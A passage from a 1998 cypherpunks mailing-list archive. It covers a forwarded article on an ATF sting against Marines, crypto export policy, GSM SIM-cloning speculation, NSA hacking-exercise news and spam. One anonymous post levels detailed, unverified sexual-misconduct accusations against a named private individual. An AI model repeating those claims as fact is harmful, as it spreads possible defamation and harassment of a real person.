        For those who missed the message, the Dallas Morning News
offered a useful
summary: "Concern over the theft of high explosives has increased in
military circles along with a broader anxiety about domestic terrorism,
especially in the aftermath of incidents such as the bombing of the
Oklahoma City federal building."

        The "right-wing menace" is the media's favorite enemy, and ATF
officials
were careful to drop tantalizing hints that "Operation Longfuse" had
uncovered something big. "You could outfit a small army with what we've
recovered," claimed ATF special agent Mark Logan. ATF spokesman Earl
Woodham primed the press for further dramatic developments: "The
investigation has really just begun. It's like we just hit the base of
an
oak tree, and if we follow it up, we may find that it branches out very
wide."

Dubious Informant

        The man who planted the acorn that grew into the ATF's "oak
tree" is a
former Marine sergeant who had served as an EOD specialist with several
of
the arrested suspects. In early 1996, this sergeant reportedly
instigated
"Operation Longfuse" when he approached authorities at Camp Lejune to
warn
them that weapons and explosives were being stolen and sold at gun shows
and gun dealerships. That his motives weren't purely idealistic is
suggested by the fact that he was careful to get complete immunity
before
taking an assignment as a paid confidential informant (CI). For the next
year and a half, the CI worked numerous stings against Marines and
civilian
gun enthusiasts.

        The feds deployed other undercover assets as part of "Longfuse"
and tried
to tailor stings to the psychology of the suspects. In the case of
Thomas
Crawford, a Marine captain stationed in Massachusetts who was among
those
arrested on October 17th, the undercover agents reportedly posed as
intelligence specialists who sought arms and explosives for deniable
missions in Latin America - "an Oliver North-type black ops project,"
according to one source. In the case of a second Marine sergeant who was
caught in the sting - and who became the second witness against Witham -
undercover feds reportedly posed as organized crime figures.

        "[The second Marine sergeant] wasn't going anywhere in the
Corps,"
Sergeant Witham asserted to The New American. "He was consistently
denied
promotions; you might say he has more 'pass-overs' than a satellite. I
suspect that he had a real need to feel important, and the undercover
agents were happy to feed his ego."

        From information made available during legal discovery, Witham
relates,
the second Marine "got involved in long drunken discussions with the
undercover people in which he claimed to have been involved in all kinds
of
crimes, including at least one murder. He supposedly helped kill a guy
and
then disposed of the body with a woodchipper. Strangely, though, the
prosecution didn't follow up on that particular story."

        The feds were willing to give credence to the second Marine's
alcohol-aided claims about Witham, which were covertly recorded. "They
initially used those drunken boasts to make three charges against me,"
Witham recalls. "The first was that I had been involved in the theft of
washing machines, dryers, and other appliances, as well as drywall and
other things of that nature. The second was that I had been involved in
forgery, and the third was that I had been involved in the theft of
explosives. The prosecution dropped the first two charges but has stuck
with the third."

        How credible is the second Marine as a witness? According to
local press
reports in North Carolina, he has twice pled guilty to perjury.
Furthermore, he faced accumulated prison terms of up to 380 years on
charges arising from "Longfuse" and reportedly made a deal with the
prosecution in which he could peddle his testimony against others for a
total of 12 years in prison - with the possibility of parole after four.
The third witness against Witham has served a prison term on
firearms-related charges. He also reportedly made a deal for his
testimony
in a previous weapons theft case involving Army personnel.

Casting a Large Net

        Given his own solid military background, and the dubious
background of the
witnesses against him, how did Sergeant Witham get entangled in this
mess?
Attorney Vaughn Taylor, who has acted as Witham's legal counsel,
believes
that the sergeant was "caught in a very large casting net" thrown out by
federal investigators. "There were two things that the government found
very significant," Taylor related to The New American. "First, they were
looking for people who had worked with Captain Crawford in EOD;
secondly,
they were looking at gun shows and people who did business at them. Of
course, these two facts don't add up to a case, particularly when the
suspect is someone like Tim Witham. As far as his military career is
concerned, Witham all but walks on water; it's impossible to imagine
someone farther from the person described in these charges."

        Nor were the feds able to develop a material case against
Witham. On
October 17th, agents from the ATF and NCIS conducted a search of
Witham's
home in Jacksonville, North Carolina; this included an examination of an
adjoining building from which Witham, a federally licensed firearms
dealer,
sold guns and related merchandise. The October 20th "Report of
Investigation" filed by special agent John S. Corpening of the ATF's
Wilmington, North Carolina field office noted that "no machine guns or
prohibited weapons were found" during the search of Witham's home and
business. The report did note that Witham was in possession of a stolen
Ruger pistol. The gun had been brought to Witham for repairs; when he
ran a
check on its serial number, he learned that it was a stolen weapon, and
informed the ATF. As instructed, Witham logged the stolen weapon in his
Acquisition and Disposition record, and held it on behalf of the ATF.

        "Strangely, the ATF's search of my home was conducted, in part,
by
students of mine," Witham informed The New American. "For about three
years
I've been involved with some of them in a drug interdiction program, so
they knew me well before all of this." (Witham has also helped train ATF
and FBI personnel in explosives disposal.) Despite the effort on the
part
of NCIS investigators and Marine officials to depict Witham as a danger
to
public order, the ATF did not seek revocation of his federal firearms
license. "Even though I was in jail for 79 days and face court-martial,
my
firearms license is still active, and my inventory is still intact,"
observes Witham. "If I had done all of the things I've been accused of,
or
any of them, would the ATF have left me with my weapons?"

        On December 19th, Major Robert Brubaker, the Judge Advocate
General
investigator who presided over Witham's "Article 32" investigation,
filed
his report, which once again noted Witham's sterling record and the
poverty
of the case against him. "Evidence was presented demonstrating that
SSgt.
Witham's military character up to this point has been excellent,"
Brubaker
pointed out. "He has a clean, in fact quite distinguished, service
record."
For a man identified as a "flight risk," Witham displayed little
inclination to escape when presented with the opportunity. Brubaker
noted
that the "chasers" - the MPs assigned to watch Witham - were quite
inept.
"To say that their supervision of their charge was loose would be an
understatement," reported the investigator. "I observed a couple of
occasions when SSgt. Witham was alone without the chasers in sight.
There
was one occasion when SSgt. Witham himself tracked down his chasers to
tell
them he was going somewhere and they needed to be with him. To me, this
rather strongly cuts against any argument that he is a serious flight
risk."

        While Brubaker stated that "there probably is sufficient
evidence to send
the case to a court-martial," he also took note of the fact that "the
government seems to be relying quite heavily on the statements of two
witnesses of questionable integrity" to make its case against Witham.
(Since that time a third witness has also offered to testify against
Witham.)

Abuse of Power

        It is possible that Witham's impeccable service record belies
his
involvement in the felonious theft of military weapons and explosives.
However, it is at least as likely that he is merely an exemplary
serviceman
who has been traduced by perjured statements offered in exchange for
special prosecutorial considerations. His case serves as a precautionary
tale about the federal government's increasing reliance upon paid
undercover informants, especially in firearms-related investigations and
other forms of covert operations against the "radical right." In his
book
Deadly Force, law enforcement analyst Carsen Stroud points out that in
1994
the Justice Department budgeted $100 million to spend on confidential
informants, many of them involved in "quasi-criminal or actively
criminal"
enterprises.

        Also significant is the potential impact on military morale
should
Sergeant Witham prove to be the innocent victim of a politically
motivated
abuse of prosecutorial power. "I love the Marine Corps and have great
respect for our federal law enforcement agencies," declares Robert
Ferris,
who was himself a respected field-grade commander. "But what is being
done
to Tim is simply wrong; it's an abuse of power by corrupt and ambitious
people who are, by God, going to get a conviction, whatever it takes to
do
so. In nearly a quarter-century of military service I've never seen a
comparable abuse of power."

-William Norman Grigg

***************************************
Visit our home page at: http://www.hackworth.com
Sign up for the free weekly Defending America newsletter on our website

Snail mail to:
P.O. Box 430
Whitefish, MT.
59937






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Thu, 16 Apr 1998 09:14:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NT
In-Reply-To: <19980416032558.6663.qmail@nsm.htp.org>
Message-ID: <3.0.5.32.19980416090646.007b8e50@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:25 AM 4/16/98 -0000, nobody@nsm.htp.org wrote:
>Anyone know how to completely crash a NT
>workstation with no possibility of recovery?
>

Depends on the processor its running :-)


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Steel : Meatspace :: Encryption : Virtual space

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 16 Apr 1998 02:19:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Great Internet Bandwidth Crisis
Message-ID: <199804160919.LAA02218@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me that the chief impediment standing in the way of the
Internet becoming a propaganda and marketing tool suitable for use
and control by a few rich and powerful business entities is the 
comparatively inexpensive and easy access of millions of users to
the same technologies available to megacorporations.

History itself leads me to suspect that the money and power moguls
will use a variety of real and imaginary issues to place greater
monetary burdens and access restrictions on many aspects of the
Internet and Web, particularly those that have commercial potential.

A current example is the attempt by various Telecos to raise the cost
of access for other businesses, citing alleged burdens placed on their
resources by ISPs at the same time that they are scrambling to enter
the same market by undercutting their competitors.
The Great Teleco Resource Crisis will undoubtedly be mirrored at some
point in the future by the Great Internet Bandwidth Crisis. I suspect
that although it will be as bogus as the Telecos' current imaginary
crisis, it will come at a time when the major players have divided up
enough of the infrastructure pie among themselves to be unanimous in
their nod-and-wink agreement as to the severity of the crisis.

Undoubtedly, this will be just one of a variety of crisis in which 
will require restrictive legislation and cost-increasing regulations
that will save bandwidth for future children and protect adult citizens
from the extreme danger of engaging in commerce with other average
adult citizens such as themselves.
It seems to me that the *only* way that the Internet can be kept from
being used as just another tool for herding the masses into larger and
more efficient feeding pens is to enable and empower the citizens to
freely and safely control their own financial and commercial destiny
in their Internet transactions.
The more accessible and widespread the control over one-to-one monetary
transactions, the more difficult it will be for a few entities to lead
the citizens around by financial rings run through their noses.

The government currently has a variety of budgetary axes held over the
heads of the citizens, such as federal funding and grants in which
money taken away from the citizens is returned to them on a statewide,
local or individual basis only upon conditions that involve giving up
rights and liberties that are due them.

In order to resist being herded by a myriad of legal, licensing and
regulatory 'axes' into increasingly global feeding pens, the citizens
will need access to tools which allow secure financial transactions with
differing levels of identity versus anonymity available to them.

The reason that major business has not yet been able to divide up the
financial pie available through the Internet is the excessive amount
of resources that they need in order to compete for the attention of
Internet users, given that average citizens are providing equal or
better information and services for free or for a low cost.
The sooner that the masses are able to engage in free commerce with
one another via the Internet--whether it be giving Grandma Jones a
dollar for her cookie recipies, or engaging a student across the
continent in private research in return for money, for goods or 
for services--then the sooner the masses will scream loud and long
when government or corporate entities threaten to take this ability
to be self-sufficient away from them.

Those who wish to circumvent the loss of privacy, liberty and freedom
that they forsee as being possible on the Internet need to realize 
that most of those who are not currently empowered to manifest those
possibilities in their individual life will little recognize or
protest the 'present' loss of those 'future' possibilities.
Unless there is a widespread dissemination of working tools accessible
to the average citizen, then the future will be controlled by those
with the funds and resources to limit financial transactions on the
Internet to a self-defined 'way things are.'

"Teach a man to buy his fish from you, and you'll feed yourself for
 a lifetime."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 16 Apr 1998 02:20:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IntenseWhore VidKid Sex Machine
Message-ID: <199804160920.LAA02259@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.pathfinder.com/time/magazine/1998/dom/980420/notebook.techwatch.levit24.html

PLAY STATION Vidkids hooked on high-impact games with stereo sound
tracks will have a tough time leaving their seats at next month's 
E3 convention. That's when BSG Laboratories will debut the Intensor,
a $500 speaker-studded chair (with between-the-legs bass and separate 
subwoofer) to give hard-core players a body-thumping shot of visceral 
reality.

  It seems to me that enterprising children with mechanical ability 
should be able to use common household items, such as vacume cleaners,
blow-driers, doorknobs and wax-fruit to 'enhance' the vidiot experience
that BSG Laboratories will be pimping.
  It seems to me that an enterprising young Tom Cruise type might be
able to combine an enhanced version of the IntenseWhore with a variety
of adult MPEGs and pick up some major cash in between his friends'
'cumings' and goings.

  Sounds like something for the 'Got My Nut'ly News to pursue.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 16 Apr 1998 11:39:05 -0700 (PDT)
To: cypherpunks
Subject: BXA Encryption Export Seminar - San Jose, April 28
Message-ID: <199804161839.LAA05360@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I think some cypherpunk representatives should attend this seminar.
It's often useful to hear what the BXA is saying when they talk to
exporters instead of a court or the press.  You will probably learn
something about crypto export law, too.  If you have a portable
cassette recorder, see if you can record it for future reference "and
for others at my company".

I'd go, but I have a bunch of committments on that date.  Let me
know how it turns out!

	John

Bureau of Export Administration - U.S. Department of Commerce
		     presents

		ENCRYPTION CONTROLS  

		   SAN JOSE, CA
	April 28, 1998 *  8:30 AM - 5:00 PM 
	  Hyatt San Jose * San Jose, CA

ENCRYPTION CONTROLS - As a result of the release of new rules
governing the export of encryption items previously controlled on the
U.S. Munitions List, the export licensing responsibilities were
transferred to the Department of Commerce (except those specially
designed, developed, configured, adapted, or modified for military
applications).

This full-day program is being held to instruct and assist the
exporting community with this change in jurisdiction. Representatives
from BXA and the National Security Agency (NSA) will explain: the
background and current U.S. policy, the main elements of the controls,
License Exception KMI and the licensing process for encryption cases,
and legislative initiatives and other issues to watch in the future.

WHO SHOULD ATTEND? - This seminar is designed for exporters, freight
forwarders, carriers, international trade consultants, attorneys, and
others who support and advise exporters. If your organization is
involved in a technology-related industry, especially computers,
electronics, defense goods/services, etc., this seminar is a must.

ENCRYPTION AGENDA
8:30-8:35 Opening
8:35-8:45 Overview of morning
8:45-9:00 Encryption Policy
	* What is it? * How does it affect your company?
9:00-9:15 Encryption Regulations
	* What's new? * What's different 
	* How to classify an encryption product
9:15-10:15 Encryption Licenses and the inter-agency review process
	* Validated  * Encryption Licensing Arrangements * Foreign Nationals
10:15-10:30 BREAK
10:30-11:00 Mass Market Encryption Software
	* Helpful Hints
11:00-12:00 License Exceptions: TMP - GOV - BAG for encryption items 
12:00-1:00 LUNCH
1:00-1:45 License Exception Key Management Infrastructure (KMI)
	* Recoverable encryption items
	* Non-recoverable 56-bit DES with a plan
1:45-2:15 Key Recovery Agents
2:15-2:45 Exports over the Internet
2:45-3:00 BREAK
3:00-3:30 Next Steps
3:30-4:00 License practice/policy
4:00-4:45 Questions & Answers

ABOUT THE INSTRUCTORS - The instructors are experienced export
administration specialists and licensing officers from BXA's
Washington, DC headquarters and Western Regional Office. The
instructors - who played a major role in drafting the new encryption
regulations - are available throughout the seminar to answer your
questions.

ACCOMMODATIONS - Special conference rates have been arranged with the
Hyatt San Jose for those who need rooms. Please make your reservations
directly with the hotel by calling (408) 993- 1234 or toll free (800)
233-1234. Mention the "BXA Seminar." Note: The hotel is conveniently
located minutes from San Jose Airport and is also easily accessible by
automobile. The Hyatt offers free parking.

QUESTIONS?- For more information on the Encryption Controls topics,
please call BXA's Western Regional Office at (714) 660-0144. For
information about registration, contact the Federation of
International Trade Associations at (800) 969-FITA or (703) 620-9098.

REGISTRATION Note: Space is limited and will be accepted on a space
availability basis . The Registration Fee for the Seminar is
$125/person and includes continental breakfast, AM & PM breaks,
luncheon and seminar materials. The registration fee is not refundable
after April 22, 1998. Cancellation prior to that date is subject to a
$25 administrative charge.

To guarantee placement for the Encryption Controls Seminar in San
Jose, FAX your registration to (703) 391-0159, and charge the fee on a
MC, VISA or American Express, or mail your registration with your
check payable to FITA-BXA to FITA, 1851 Alexander Bell Drive, Suite
400, Reston, VA 20191.

Attendee Name(s): ____________________________________________________________ 
Company Name:     ____________________________________________________________
Street Address:   ____________________________________________________________
City, State, Zip: ____________________________________________________________
      Phone:      _______________________       Fax: _________________________

[  ] Enclosed is my check for $___________ ($125/person)
[  ]  We prefer to pay by credit card: ____ MC,   ____ Visa,   ____ AMEX

Amount $_________ Acct #_______________________________ Expiry date:__________
Cardholder Name: ___________________________________________________
Cardholder Signature:________________________________________________

			Sponsored by
The Federation of International Trade Associations (FITA)
(For information about FITA, call toll-free (800) 926-FITA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
Date: Thu, 16 Apr 1998 10:35:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PGP and crypto News from France
Message-ID: <c2969a5d4085f0144d3d5e5ab7cc9dcd@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain






-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------
PLEASE REPLY ONLY TO : <pplf@usa.net>
- ----------------------------------------------------------

SUBJET : PGP and crypto News from France


Hi all,

We're glad to announce an english "PGP and crypto News from France" on
the PGP FOR FRENCH site, and a "beta" ;-) translation of our little
PGP History, here :
http://www.geocities.com/SiliconValley/Bay/9648/pgpnews.htm

Bye

- --------------------------------------------------------------------
PGP pour les francais / PGP even for the French <pplf@usa.net>
http://www.geocities.com/SiliconValley/Bay/9648
PGPkey 14A0 4A67 0431 2402 684D  6EBA 537F 664D 3F80 0D58
http://www.geocities.com/SiliconValley/Bay/9648/pplf.txt
- ---------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

iQA/AwUBNTRhsVN/Zk0/gA1YEQJQHACfWWAhaHVKblH2S0VSazSw94F8FXUAoPt+
bxFrPDrfbgcPQgLD3NgULSA2
=8Wr+
-----END PGP SIGNATURE-----
       






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 1-800-893-6001@toll.free
Date: Thu, 16 Apr 1998 15:25:38 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: ---> How Can I Pay You For My Order
Message-ID: <199804162225.PAA07498@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Turn Key Payment Solutions - Sell From Your Web Site 

Take Checks By Phone - Fax - Or At Your Web Site - FREE
or Take Credit Cards - MasterCard - Visa - AMEX and more...

Our site has changed since you last visited, so please take the 
time to visit again, you will be glad you did.

<a href=" http://www.hoststar.com/payments/">Internet Payment 
Solutions</a>

You can call us directly at 1-800-893-6001 or see our site for 
other contact information.

No company offers easier web commerce solutions - 

Checks by phone
Credit card merchant accounts
Secure Payment Form Hosting for your web site
Free Collection Services




*****************************************************************
This mailing was sent by RCS Promotions on behalf of the 
above client. RCS is not affiliated with the above client, other 
than to provide a mailing service. Removal options are available 
at the above listed web site. Questions about names, lists and 
marketing may be directed to RCS Promotions at 781-892-4191.
*****************************************************************
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Thu, 16 Apr 1998 15:11:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: eligable receiver
Message-ID: <3.0.5.32.19980416151200.007b6670@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



THE WASHINGTON TIMES
    April 16, 1998
    Bill Gertz

    Computer hackers could disable military; System compromised in secret
    exercise



    Senior Pentagon leaders were stunned by a military exercise showing
    how easy it is for hackers to cripple U.S. military and civilian
    computer networks, according to new details of the secret exercise. 

    Using software obtained easily from hacker sites on the Internet, a
    group of National Security Agency officials could have shut down the
    U.S. electric-power grid within days and rendered impotent the
    command-and-control elements of the U.S. Pacific Command, said
    officials familiar with the war game, known as Eligible Receiver. 

    "The attack was actually run in a two-week period and the results were
    frightening," said a defense official involved in the game. "This
    attack, run by a set of people using standard Internet techniques,
    would have basically shut down the command-and-control capability in
    the Pacific theater for some considerable period of time." 

    Pentagon spokesman Kenneth Bacon said, "Eligible Receiver was an
    important and revealing exercise that taught us that we must be better
    organized to deal with potential attacks against our computer systems
    and information infrastructure." 

    The secret exercise began last June after months of preparation by the
    NSA computer specialists who, without warning, targeted computers used
    by U.S. military forces in the Pacific and in the United States. 

    The game was simple: Conduct information warfare attacks, or
    "infowar," on the Pacific Command and ultimately force the United
    States to soften its policies toward the crumbling communist regime in
    Pyongyang. The "hackers" posed as paid surrogates for North Korea. 

    The NSA "Red Team" of make-believe hackers showed how easy it is for
    foreign nations to wreak electronic havoc using computers, modems and
    software technology widely available on the darker regions of the
    Internet: network-scanning software, intrusion tools and
    password-breaking "log-in scripts." 

    According to U.S. officials who took part in the exercise, within days
    the team of 50 to 75 NSA officials had inflicted crippling damage. 

    They broke into computer networks and gained access to the systems
    that control the electrical power grid for the entire country. If they
    had wanted to, the hackers could have disabled the grid, leaving the
    United States in the dark. 

    Groups of NSA hackers based in Hawaii and other parts of the United
    States floated effortlessly through global cyberspace, breaking into
    unclassified military computer networks in Hawaii, the headquarters of
    the U.S. Pacific Command, as well as in Washington, Chicago, St. Louis
    and parts of Colorado. 

    "The attacks were not actually run against the infrastructure
    components because we don't want to do things like shut down the power
    grid," said a defense official involved in the exercise. "But the
    referees were shown the attacks and shown the structure of the
    power-grid control, and they agreed, yeah, this attack would have shut
    down the power grid." 

    Knocking out the electrical power throughout the United States was
    just a sideline for the NSA cyberwarriors. Their main target was the
    U.S. Pacific Command, which is in charge of the 100,000 troops that
    would be called on to deal with wars in Korea or China. 

    "The most telling thing for the Department of Defense, when all was
    said and done, is that basically for a two-week period the
    command-and-control capability in the Pacific theater would have been
    denied by the 'infowar' attacks, and that was the period of the
    exercise," the official said. 

    The attackers also foiled virtually all efforts to trace them. FBI
    agents joined the Pentagon in trying to find the hackers, but for the
    most part they failed. Only one of the several NSA groups, a unit
    based in the United States, was uncovered. The rest operated without
    being located or identified. 

    The attackers breached the Pentagon's unclassified global computer
    network using Internet service providers and dial-in connections that
    allowed them to hop around the world. 

    "It's a very, very difficult security environment when you go through
    different hosts and different countries and then pop up on the
    doorstep of Keesler Air Force Base [in Mississippi], and then go from
    there into Cincpac," the official said, using the acronym for the
    Commander in Chief, Pacific. 

    The targets of the network attacks also made it easy. "They just were
    not security-aware," said the official. 

    A second official found that many military computers used the word
    "password" for their confidential access word. 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Clarke's Third Law: Any sufficiently advanced technology is
indistinguishable from magic.

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 16 Apr 1998 23:11:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DataFellows wins President's Export Award
Message-ID: <3.0.5.32.19980416181548.0085c550@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


It's nice that _some_ presidents give awards for crypto export
instead of trying to stop it!
------------------------------------
http://www.datafellows.com/news/finexpo.htm

4 February 1998 
The developer of F-Secure data security products, Data Fellows Ltd., has received the
President of Finland's Export Award. This award is granted annually to the most
outstanding export companies in the country. This is the first time a developer of
commercial software packages has been granted the award. 
-------------------------------------------------------------------
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
Date: Thu, 16 Apr 1998 18:25:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: eligable receiver
Message-ID: <19980417012439.18318.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


  From: 
        David Honig <honig@alum.mit.edu>

THE WASHINGTON TIMES
    Computer hackers could disable military; System compromised in 
secret
    exercise

  So when can we expect to hear the first announcements of high-level 
military resignations over the disgraceful state that they have let
our national security fall into while wasting billions of dollars
of our money?

  Please zipfile the announcements forwarded to the list, so that
their massive volume does not swamp all of our email accounts.

cjp


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Thu, 16 Apr 1998 18:38:51 -0700 (PDT)
To: Marc Briceno <marc@cryptsoft.com>
Subject: Re: GSM cellphones cloned---Threats?
In-Reply-To: <Pine.BSF.3.96.980415220601.9329B-100000@pakastelohi.cypherpunks.to>
Message-ID: <19980416214030.04140@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, Apr 16, 1998 at 05:50:36AM +1000, Marc Briceno wrote:
> 
> Several radio enineers I talked with speculated that it /might/ even be
> possible to modify a standard GSM phone to act as a rouge "key reaper"
> base station. I am not a radio engineer and have no way to verify this
> claim.

	The modifications would be fairly major and rather difficult on
a surface mount high density low cost phone PC board.  A lot of the
stuff required is in ASICs in a typical phone, and they are not in
general easily adapted to playing a different role even if the full
design database and phone schematics are available to the hacker which
it would not be.

	On the other hand, some of the components of a standard GSM
phone  could be used to fill a number of functions in such an animal,
and a couple of partially stripped GSM phone PC cards would certainly be
useful as part of such.  I would see such a probe base station as a
briefcase size object run by a laptop or powerful palmtop spliced into
two or three hacked up phone PC cards with some added signal processing
logic in a FPGA or two (and maybe an added RF modem chip as well).

	Of course some older phone designs might be less ASIC intensive
and more adaptable, although the 1.9 ghz PCS US versions are mostly
pretty recent.   And there may be some universal multi-standard brand
that is much more software configured than others and might be an easier
jumping off place - I certainly have not investigated this at all (nor
do I expect to).



	On another topic - privacy...


	Your break suggests that A3/A8 may have been deliberately
weakened to allow such SIM probing.   Intelligence agencies are not in
general  interested in cloning, but for those without access to whatever
magic hardware (or software) exists for cracking A5/1 at low cost in
real time, the ability to once recover the SIM secret allows easy
listening to all subsequent calls from that phone (or SIM) with no
required cracking hardware time or access.  And this is very valuable in
lots of situations, such as covert operations out of hotels in foreign
places where having highly classified A5 cracking boxes in tow would be
a significant security risk.

	And for countries with GSM phone systems interested in spying
on visiting diplomats, heads of state, or trade delegations who are using
their GSM phones in a roaming mode and depending on the fact the GSM home
switching office does not disclose their long term secret, such probing can
be quietly concealed in the real traffic of a legitimate base station.
The secrets recovered can then be used to crack traffic back in the
visitor's home country where he may be trusting his local system to
be secure.

	And the ability to probe the phones of visiting dignitaries from
nearby hotel rooms and recover their secrets must be awfully useful to
many even third rate intelligence operations - this allows listening to
all their subsequent traffic without requiring an A5/1 cracking
capability at all - let alone one that works real time from low cost
portable units.

	And even if there is some sanity test in GSM phone firmware that
would catch or prevent enough probes to crack the SIM secret, your 
physical access method allows black bag jobs to recover the SIM secret
of phones left poorly guarded for a few hours.   This alone
is very obviously of great use to intelligence types (at least unless
there is some hardware backdoor in the SIM to allow the readout in
seconds rather than hours).



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArtNoire <ArtNoire@aol.com>
Date: Thu, 16 Apr 1998 22:10:13 -0700 (PDT)
Subject: woah
Message-ID: <f2f25c85.3536e25a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: ArtNoire@aol.com
Subject: woah
From: ArtNoire <ArtNoire@aol.com>
Date: Fri, 17 Apr 1998 00:53:09 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.spree.com/iconz/index.html">Click here to see my
picture</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 16 Apr 1998 16:36:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NoneRe: Gary Lee Burnore, Registered Sex Offender in Raleigh, NC
In-Reply-To: <gburnoreEr8085.po@netcom.com>
Message-ID: <199804162336.BAA25338@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Lee Burnore <gburnore@databasix.com> wrote:

> In 11/96, I kissed a 17 year old girl.  I'm not going to provide you
> with a lot of detail because this isn't the place for it.  

If the girl's mother had heeded the earlier warning she received via e-mail
about your behavior several months earlier (the one you called "harassment"
at the time), this all could have been prevented.  You're lucky that the
11/96 "kiss" is all you were arrested for.  You were foolish to continue it
knowing that Nancy had already been tipped off.

In case you've forgotten, you whined:

-> So now the cowards in Ronald Francis's corner (I'm outright expecting the
-> culprit to be ronald francis himself) have taken to sending email to
-> those who have names listed on databasix's web page.  Sending comments to
-> a 17 year old that they're going to tell her mother that she's having an
-> affair with me.  Telling her mother that I'm molesting her daughter.
-> Having all sorts of fun.

And you threatened to report the anonymous whistleblower to the
authorities?  What chutzpah!  You're molesting a minor, someone tips off
her mother, and you threaten to report the person who tipped her off about
your behavior?

Your claim has now been proven to be a lie.  How would the mere fact that
the girl had a web page at databasix.com have alerted an outsider to the
fact that you were molesting her?  Presumably she didn't post her diary on
her web page, detailing your sexual activities towards her.  Where would
"Ronald Francis", or any other random "harasser" have obtained this
information?  You were too quick to dismiss the idea that all the alleged
"harassment" and spam baiting might have originated from a DataBasix
insider with detailed knowledge of your private life, as well as the
complete list of all DataBasix employees and customers that Belinda Bryan
claimed had been "spam baited".  Who else is getting ahold of all this
inside info, Gary?

> I pass no
> judgment on whether or not she instigated it.  I held myself
> responsible.  That's why I went to see a counselor and offered to pay
> for hers if she wanted to do the same.
>
> It was at the counselor's office that I learned what had happened was
> considered a crime under CA law.  I discussed this with the girl and
> her mother; neither wanted to get law enforcement involved.

But apparently it was serious enough that both your victim and her mother
thought you needed psychiatric help.  (Plenty of people on usenet could
have told you that.)

> To date, this ordeal has cost me nearly $30,000.00 in legal fees, lost
> wages, and other costs.   That however,  is nothing compared to the
> emotional stress of this.  

You spent $30K on what was supposedly a misdemeanor charge to which you
pled guilty?  Someone must have seen you "coming"?  Was it Nancy?

The maximum penalty for a misdemeanor is what?  6 months + $500?  You spent
$30K to get off with 3 years probation?  On a 6 month sentence, you'd
probably have been out in 3 months, and that's assuming you got the maximum
sentence.  Or was the $30K to get it plea bargained down from a more
serious charge?

> It goes on and on and on.

I thought the shrink was to ensure that if didn't.
   
> You know what's so damn frustrating about this?  I chose to talk to a
> councelor about this even though I knew it would bring charges.  I was
> doing the right thing.

What statute in California makes it a misdemeanor to kiss a 17 year old
girl?  (It must make senior proms a lot of fun there if such a law really
exists as you claim.)  Or does it depend on what part of her body you
"kissed" her?

It's also interesting that when it was revealed that you had also been
arrested in San Francisco for unlawful assembly in blocking traffic, you
minimized it and called it a mere "traffic ticket", concealing the fact
that you had already been convicted of something more serious.

Then when someone finally reveals a second criminal conviction on your
record, your sock puppets whine that it's a "half truth".  Well, gee, Gary,
you were content when the WHOLE truth was being concealed.  So much for you
"I have nothing to hide" boast!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tyrone W. Grandison" <tgrandsn@uwimona.edu.jm>
Date: Thu, 16 Apr 1998 23:58:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EC
